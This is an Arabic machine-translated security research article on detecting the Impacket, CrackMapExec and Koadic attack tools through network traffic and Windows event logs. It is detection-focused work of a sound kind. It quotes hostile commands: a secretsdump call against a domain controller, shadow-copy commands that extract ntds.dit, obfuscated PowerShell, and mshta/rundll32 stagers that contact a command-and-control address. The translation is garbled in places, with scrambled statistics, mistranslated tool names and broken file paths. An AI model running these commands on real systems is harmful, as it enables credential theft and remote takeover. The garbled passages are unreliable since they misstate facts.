كيفية اكتشاف الهجمات على البنية الأساسية لنظام Windows: استكشاف أدوات القرصنة

يتزايد عدد الهجمات في قطاع الشركات كل عام: على سبيل المثال ، سجلت 2017٪ حوادث فريدة أكثر في عام 13 مما كانت عليه في عام 2016 ، وفي نهاية عام 2018 - 27٪ حوادث أكثرمما كانت عليه في الفترة السابقة. بما في ذلك تلك التي تكون فيها أداة العمل الرئيسية هي نظام التشغيل Windows. في 2017-2018 ، APT Dragonfly ، APT28 ، ايه بي تي مودي ووتر نفذت هجمات على مؤسسات حكومية وعسكرية في أوروبا وأمريكا الشمالية والسعودية. وقد استخدموا ثلاث أدوات لهذا - إمباكيت, CrackMapExec и كوديك. كود المصدر الخاص بهم مفتوح ومتاح على GitHub.

من الجدير بالذكر أن هذه الأدوات لا تستخدم للاختراق الأولي ، ولكن لتطوير هجوم داخل البنية التحتية. يستخدمها المهاجمون في مراحل مختلفة من الهجوم بعد اختراق المحيط. هذا ، بالمناسبة ، يصعب اكتشافه وغالبًا ما يكون ذلك بمساعدة التكنولوجيا الكشف عن آثار التسوية في حركة مرور الشبكة أو أدوات الكشف عن الإجراءات النشطة للمتطفل بعد أن يخترق البنية التحتية. توفر الأدوات مجموعة متنوعة من الوظائف ، من نقل الملفات إلى التفاعل مع السجل وتنفيذ الأوامر على جهاز بعيد. أجرينا دراسة لهذه الأدوات لتحديد نشاط الشبكة الخاصة بهم.

ما يتعين علينا القيام به:

• افهم كيف تعمل أدوات القرصنة. اكتشف ما يحتاج المهاجمون لاستغلاله والتقنيات التي يمكنهم استخدامها.
• ابحث عن ما لم تكتشفه أدوات أمن المعلومات في المراحل الأولى للهجوم. يمكن تخطي مرحلة الاستطلاع ، إما لأن المهاجم هو مهاجم داخلي ، أو لأن المهاجم يستغل خللاً في البنية التحتية لم يكن معروفًا من قبل. يصبح من الممكن استعادة سلسلة أفعاله بأكملها ، ومن هنا تنشأ الرغبة في اكتشاف المزيد من الحركة.
• تخلص من الإيجابيات الكاذبة من أدوات كشف التسلل. يجب ألا ننسى أنه عندما يتم اكتشاف أفعال معينة على أساس الذكاء وحده ، فمن الممكن حدوث أخطاء متكررة. عادةً ما يوجد في البنية التحتية عدد كافٍ من الطرق ، لا يمكن تمييزها عن الشرعية للوهلة الأولى ، للحصول على أي معلومات.

ماذا تقدم هذه الأدوات للمهاجمين؟ إذا كانت Impacket ، فسيحصل المهاجمون على مكتبة كبيرة من الوحدات التي يمكن استخدامها في مراحل مختلفة من الهجوم بعد اختراق المحيط. تستخدم العديد من الأدوات وحدات Impacket داخليًا ، مثل Metasploit. يحتوي على dcomexec و wmiexec لتشغيل الأوامر عن بُعد ، و secretsdump للحصول على حسابات الذاكرة المضافة من Impacket. نتيجة لذلك ، فإن الكشف الصحيح عن نشاط مثل هذه المكتبة سيضمن الكشف عن المشتقات.

حول CrackMapExec (أو ببساطة CME) ، كتب المبدعون "Powered by Impacket" لسبب ما. بالإضافة إلى ذلك ، تمتلك CME وظائف جاهزة للسيناريوهات الشائعة: هذا هو Mimikatz للحصول على كلمات المرور أو تجزئاتها ، وإدخال Meterpreter أو Empire agent للتنفيذ عن بعد ، و Bloodhound على متن الطائرة.

الأداة الثالثة التي نختارها هي Koadic. إنه جديد تمامًا ، وقد تم تقديمه في مؤتمر القراصنة الدولي DEFCON 25 في عام 2017 وله نهج غير قياسي: فهو يعمل من خلال HTTP و Java Script و Microsoft Visual Basic Script (VBS). يسمى هذا النهج العيش خارج الأرض: تستخدم الأداة مجموعة من التبعيات والمكتبات المضمنة في Windows. يسميها المبدعون الأمر COM Command & Control أو C3.

IMPACKET

وظائف Impacket واسعة جدًا ، بدءًا من الاستطلاع داخل AD وجمع البيانات من خوادم MS SQL الداخلية ، وتنتهي بتقنيات الحصول على بيانات الاعتماد: هذا هجوم ترحيل SMB ، والحصول على ملف ntds.dit الذي يحتوي على تجزئة كلمة مرور المستخدم من مجال مراقب. ينفذ Impacket أيضًا الأوامر عن بُعد باستخدام أربع طرق مختلفة: عبر WMI ، وهي خدمة لإدارة جدولة Windows و DCOM و SMB ، ولهذا تحتاج إلى بيانات اعتماد.

تفريغ سري

دعونا نلقي نظرة على secretsdump. هذه وحدة يمكنها استهداف أجهزة المستخدم ووحدات التحكم بالمجال. باستخدامه ، يمكنك الحصول على نسخ من مناطق ذاكرة LSA و SAM و SECURITY و NTDS.dit ، بحيث يمكن رؤيتها في مراحل مختلفة من الهجوم. الخطوة الأولى في تشغيل الوحدة هي المصادقة عبر SMB ، والتي تتطلب إما كلمة مرور المستخدم أو التجزئة الخاصة بها لتنفيذ هجوم Pass the Hash تلقائيًا. يأتي بعد ذلك طلبًا لفتح الوصول إلى مدير التحكم في الخدمة (SCM) والوصول إلى السجل باستخدام بروتوكول winreg ، والذي يمكن للمهاجم من خلاله معرفة بيانات الفروع التي تهمه والحصول على النتائج عبر SMB.

على التين. 1 نرى بالضبط كيف ، عند استخدام بروتوكول winreg ، يتم الحصول على الوصول عن طريق مفتاح التسجيل مع LSA. للقيام بذلك ، استخدم الأمر DCERPC مع كود التشغيل 15 - OpenKey.

أرز. 1. فتح مفتاح التسجيل باستخدام بروتوكول winreg

علاوة على ذلك ، عند الحصول على الوصول عن طريق المفتاح ، يتم حفظ القيم بواسطة أمر SaveKey مع كود التشغيل 20. يقوم Impacket بذلك بطريقة محددة للغاية. يقوم بحفظ القيم في ملف اسمه عبارة عن سلسلة مكونة من 8 أحرف عشوائية مع إلحاق .tmp. بالإضافة إلى ذلك ، يحدث تفريغ إضافي لهذا الملف عبر SMB من دليل System32 (الشكل 2).

أرز. 2. مخطط للحصول على مفتاح التسجيل من جهاز بعيد

اتضح أنه يمكنك اكتشاف مثل هذا النشاط على الشبكة من خلال الاستعلام عن فروع معينة من السجل باستخدام بروتوكول winreg وأسماء وأوامر محددة وترتيبها.

أيضًا ، تترك هذه الوحدة آثارًا في سجل أحداث Windows ، بفضل سهولة اكتشافها. على سبيل المثال ، نتيجة لتنفيذ الأمر

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

في سجل Windows Server 2016 ، سنرى التسلسل الأساسي التالي للأحداث:

1. 4624 - تسجيل الدخول عن بعد.
2. 5145 - التحقق من حقوق الوصول إلى خدمة winreg عن بُعد.
3. 5145 - التحقق من حقوق الوصول إلى ملف في دليل System32. الملف له الاسم العشوائي المذكور أعلاه.
4. 4688 - إنشاء عملية cmd.exe التي تقوم بتشغيل vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - إنشاء عملية بالأمر:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - إنشاء عملية بالأمر:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - إنشاء عملية بالأمر:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

سمبيكسيك

مثل العديد من أدوات ما بعد الاستغلال ، يحتوي Impacket على وحدات لتنفيذ الأوامر عن بُعد. سنركز على smbexec ، والذي يمنحك غلاف أوامر تفاعلي على جهاز بعيد. تتطلب هذه الوحدة أيضًا المصادقة عبر SMB إما بكلمة مرور أو تجزئة. على التين. 3 نرى مثالاً على تشغيل مثل هذه الأداة ، في هذه الحالة هي وحدة تحكم المسؤول المحلي.

أرز. 3. وحدة تحكم smbexec التفاعلية

الخطوة الأولى في smbexec بعد المصادقة هي فتح SCM باستخدام الأمر OpenSCManagerW (15). الاستعلام ملحوظ: لقد تم تعيين حقل MachineName إلى DUMMY.

أرز. 4. طلب ​​فتح مدير مراقبة الخدمة

بعد ذلك ، يتم إنشاء الخدمة باستخدام الأمر CreateServiceW (12). في حالة smbexec ، يمكننا أن نرى نفس منطق بناء الأمر في كل مرة. على التين. 5 اللون الأخضر يشير إلى المعلمات غير القابلة للتغيير للأمر ، الأصفر - ما يمكن للمهاجم تغييره. من السهل أن ترى أنه يمكن تغيير اسم الملف القابل للتنفيذ ودليله وملف الإخراج ، لكن الباقي يصعب تغييره دون انتهاك منطق وحدة Impacket.

أرز. 5. طلب ​​إنشاء خدمة باستخدام مدير التحكم بالخدمة

يترك Smbexec أيضًا آثارًا واضحة في سجل أحداث Windows. في سجل Windows Server 2016 لقشرة أوامر تفاعلية باستخدام الأمر ipconfig ، نرى التسلسل الأساسي التالي للأحداث:

1. 4697 - تثبيت الخدمة على جهاز الضحية:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - إنشاء عملية cmd.exe باستخدام الوسائط من النقطة 1.
3. 5145 - التحقق من حقوق الوصول لملف __output في الدليل C $.
4. 4697 - تركيب الخدمة على جهاز الضحية.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - إنشاء عملية cmd.exe باستخدام الوسائط من النقطة 4.
6. 5145 - التحقق من حقوق الوصول لملف __output في الدليل C $.

Impacket هو الأساس لتطوير أدوات الهجوم. يدعم جميع البروتوكولات تقريبًا في البنية التحتية لنظام Windows وفي نفس الوقت له خصائصه الخاصة. فيما يلي طلبات winreg محددة ، واستخدام SCM API مع التشكيل المميز للأوامر ، وتنسيق أسماء الملفات ، ومشاركة SMB SYSTEM32.

كراكمابيكسيك

تم تصميم أداة CME بشكل أساسي لأتمتة الإجراءات الروتينية التي يتعين على المهاجم تنفيذها من أجل التقدم داخل الشبكة. يتيح لك العمل جنبًا إلى جنب مع وكيل Empire الشهير و Meterpreter. لتنفيذ الأوامر بشكل غير مرئي ، يمكن لـ CME تشويشها. باستخدام Bloodhound (أداة استطلاع منفصلة) ، يمكن للمهاجم أتمتة البحث عن جلسة مسؤول مجال نشطة.

الكلب البوليسي

يسمح لك Bloodhound كأداة قائمة بذاتها بإجراء استطلاع متقدم داخل الشبكة. يجمع بيانات حول المستخدمين والآلات والمجموعات والجلسات ويأتي كبرنامج نصي PowerShell أو ثنائي. يتم استخدام بروتوكول LDAP أو البروتوكولات القائمة على SMB لجمع المعلومات. تتيح لك وحدة تكامل CME تنزيل Bloodhound على جهاز الضحية وتشغيله واستلام البيانات التي تم جمعها بعد التنفيذ ، وبالتالي أتمتة الإجراءات في النظام وجعلها أقل وضوحًا. يقدم الغلاف الرسومي لـ Bloodhound البيانات التي تم جمعها في شكل رسوم بيانية ، مما يسمح لك بالعثور على أقصر مسار من جهاز المهاجم إلى مسؤول المجال.

أرز. 6. واجهة الكلب البوليسي

للتشغيل على جهاز الضحية ، تقوم الوحدة بإنشاء مهمة باستخدام ATSVC و SMB. ATSVC هي واجهة للعمل مع برنامج جدولة مهام Windows. يستخدم CME وظيفته NetrJobAdd (1) لإنشاء وظائف عبر الشبكة. يظهر مثال على ما ترسله وحدة CME في الشكل. 7: هذا استدعاء للأمر cmd.exe والتعليمات البرمجية المبهمة على شكل وسيطات بتنسيق XML.

الشكل 7. إنشاء مهمة عبر التعليم الطبي المستمر

بعد أن يتم تقديم المهمة للتنفيذ ، يبدأ جهاز الضحية كلب الصيد نفسه ، ويمكن رؤية ذلك في حركة المرور. تتميز الوحدة باستعلامات LDAP للحصول على مجموعات قياسية ، وقائمة بجميع الأجهزة والمستخدمين في المجال ، والحصول على معلومات حول جلسات المستخدم النشطة من خلال طلب SRVSVC NetSessEnum.

أرز. 8. الحصول على قائمة الجلسات النشطة عبر SMB

بالإضافة إلى ذلك ، فإن بدء تشغيل Bloodhound على جهاز الضحية مع تمكين التدقيق مصحوبًا بحدث برقم التعريف 4688 (إنشاء العملية) واسم العملية «C:WindowsSystem32cmd.exe». من الجدير بالذكر فيه وسيطات سطر الأوامر:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

enum_avproducts

تعتبر وحدة enum_avproducts مثيرة جدًا للاهتمام من وجهة نظر الوظائف والتنفيذ. يسمح لك WMI باستخدام لغة استعلام WQL للحصول على بيانات من كائنات Windows المختلفة ، وهو ما تستخدمه وحدة CME بشكل أساسي. يقوم بإنشاء استعلامات لفئات AntiSpywareProduct و AntiMirusProduct حول أدوات الحماية المثبتة على جهاز الضحية. من أجل الحصول على البيانات المطلوبة ، تتصل الوحدة بمساحة اسم rootSecurityCenter2 ، ثم تنشئ استعلام WQL وتتلقى استجابة. على التين. 9 يوضح محتوى هذه الطلبات والاستجابات. في مثالنا ، تم العثور على Windows Defender.

أرز. 9. نشاط الشبكة لوحدة enum_avproducts

غالبًا ما يمكن إيقاف تشغيل تدقيق WMI (تتبع نشاط WMI) ، حيث يمكنك العثور على معلومات مفيدة حول استعلامات WQL. ولكن إذا تم تمكينه ، إذا تم تشغيل البرنامج النصي enum_avproducts ، فسيتم تخزين حدث بالمعرف 11. وسيحتوي على اسم المستخدم الذي أرسل الطلب والاسم في مساحة الاسم rootSecurityCenter2.

كان لكل وحدة من وحدات التعليم الطبي المستمر أدواتها الخاصة ، سواء كانت استعلامات WQL محددة أو إنشاء نوع معين من المهام في برنامج جدولة المهام مع التعتيم والنشاط الخاص بكلاب الدم في LDAP و SMB.

كوادك

الميزة المميزة لـ Koadic هي استخدام مترجمي JavaScript و VBScript المدمجين في Windows. وبهذا المعنى ، فإنه يتبع اتجاه العيش على الأرض - أي أنه لا يحتوي على تبعيات خارجية ويستخدم أدوات Windows القياسية. هذه أداة لقيادة وتحكم كامل (CnC) ، لأنه بعد الإصابة ، يتم تثبيت "غرسة" على الجهاز ، مما يسمح بالتحكم فيه. مثل هذه الآلة ، في مصطلحات Koadic ، تسمى "الزومبي". إذا لم تكن هناك امتيازات كافية للعمل بشكل كامل من جانب الضحية ، فإن Koadic لديها القدرة على رفعها باستخدام تقنيات تجاوز التحكم في حساب المستخدم (تجاوز UAC).

أرز. 10. قذيفة قيادة Koadic

يجب على الضحية بدء الاتصال بخادم القيادة والتحكم. للقيام بذلك ، تحتاج إلى الوصول إلى URI مُعد مسبقًا والحصول على جسم Koadic الرئيسي باستخدام أحد أجهزة stagers. على التين. 11 يُظهر مثالاً على stager mshta.

أرز. 11. تهيئة الدورة مع خادم CnC

من خلال متغير WS للاستجابة ، يتضح أن التنفيذ يحدث من خلال WScript.Shell ، وتحتوي متغيرات STAGER و SESSIONKEY و JOBKEY و JOBKEYPATH و EXPIRE على معلومات أساسية حول معلمات الجلسة الحالية. هذا هو أول زوج طلب واستجابة في اتصال HTTP بخادم CnC. ترتبط الطلبات اللاحقة ارتباطًا مباشرًا بوظيفة الوحدات النمطية المسماة (الغرسات). تعمل جميع وحدات Koadic فقط مع جلسة CnC نشطة.

Mimikatz

تمامًا مثل CME الذي يعمل مع Bloodhound ، يعمل Koadic مع Mimikatz كبرنامج منفصل ولديه عدة طرق لتشغيله. يوجد أدناه زوج من الطلبات والاستجابة لتنزيل غرسة Mimikatz.

أرز. 12. نقل Mimikatz إلى Koadic

يمكنك أن ترى كيف تغير تنسيق URI في الطلب. لها قيمة لمتغير csrf ، وهو المسؤول عن الوحدة النمطية المحددة. لا تلتفت إلى اسمها ؛ نعلم جميعًا أن CSRF يُفهم عادةً بشكل مختلف. جاء نفس الجسم الرئيسي لـ Koadic ردًا ، والذي تمت إضافة الرمز المتعلق بـ Mimikatz. إنه كبير جدًا ، لذا دعونا نلقي نظرة على النقاط الرئيسية. هنا مكتبة Mimikatz بترميز base64 ، وفئة .NET المتسلسلة التي ستضخها ، والحجج لتشغيل Mimikatz. يتم إرسال نتيجة التنفيذ عبر الشبكة بنص واضح.

أرز. 13. نتيجة تشغيل Mimikatz على آلة بعيدة

Exec_cmd

لدى Koadic أيضًا وحدات يمكنها تنفيذ الأوامر عن بُعد. هنا سنرى نفس طريقة إنشاء URI ومتغيرات sid و csrf المألوفة. في حالة الوحدة النمطية exec_cmd ، تتم إضافة رمز إلى الجسم قادر على تنفيذ أوامر shell. يتم عرض الكود التالي في استجابة HTTP لخادم CnC.

أرز. 14. رمز الغرسة exec_cmd

مطلوب متغير GAWTUUGCFI مع سمة WS المألوفة لتنفيذ التعليمات البرمجية. بمساعدتها ، تستدعي الغرسة الصدفة ، وتعالج فرعين من الكود - shell.exec مع عودة دفق بيانات الإخراج و shell.run دون الرجوع.

Koadic ليست أداة نموذجية ، ولكن لها آثارها الخاصة التي يمكن من خلالها العثور عليها في حركة المرور المشروعة:

• تشكيل خاص لطلبات HTTP ،
• باستخدام winHttpRequests API ،
• إنشاء كائن WScript.Shell عبر ActiveXObject ،
• هيئة تنفيذية كبيرة.

يبدأ الاتصال الأولي جهاز stager ، بحيث يصبح من الممكن اكتشاف نشاطه من خلال أحداث Windows. بالنسبة إلى mshta ، هذا هو الحدث 4688 ، والذي يشير إلى إنشاء عملية بالسمة start:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

أثناء تنفيذ Koadic ، يمكن رؤية أحداث 4688 أخرى بسمات تميزها تمامًا:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

النتائج

يكتسب اتجاه العيش بعيدًا عن الأرض شعبية بين مجرمي الإنترنت. يستخدمون أدوات وآليات Windows المضمنة لاحتياجاتهم. نرى الأدوات الشائعة Koadic و CrackMapExec و Impacket التي تتبع هذا المبدأ تظهر أكثر وأكثر في تقارير APT. يتزايد أيضًا عدد الشوكات على GitHub لهذه الأدوات ، وتظهر أخرى جديدة (يوجد بالفعل حوالي ألف منها الآن). يكتسب هذا الاتجاه شعبية بسبب بساطته: لا يحتاج المهاجمون إلى أدوات تابعة لجهات خارجية ، فهم موجودون بالفعل على أجهزة الضحايا ويساعدون في تجاوز الإجراءات الأمنية. نحن نركز على دراسة تفاعل الشبكة: كل أداة موصوفة أعلاه تترك آثارها في حركة مرور الشبكة ؛ سمحت لنا دراستهم التفصيلية بتعليم منتجنا اكتشاف هجوم الشبكة PT لاكتشافها ، مما يساعد في النهاية على التحقيق في سلسلة الحوادث الإلكترونية التي تنطوي عليها.

الكتاب:

• Anton Tyurin ، رئيس قسم خدمات الخبراء ، مركز أمان الخبراء في شركة PT ، التقنيات الإيجابية
• إيجور بودموكوف ، خبير ، مركز أمان الخبراء في شركة PT ، التقنيات الإيجابية

المصدر: www.habr.com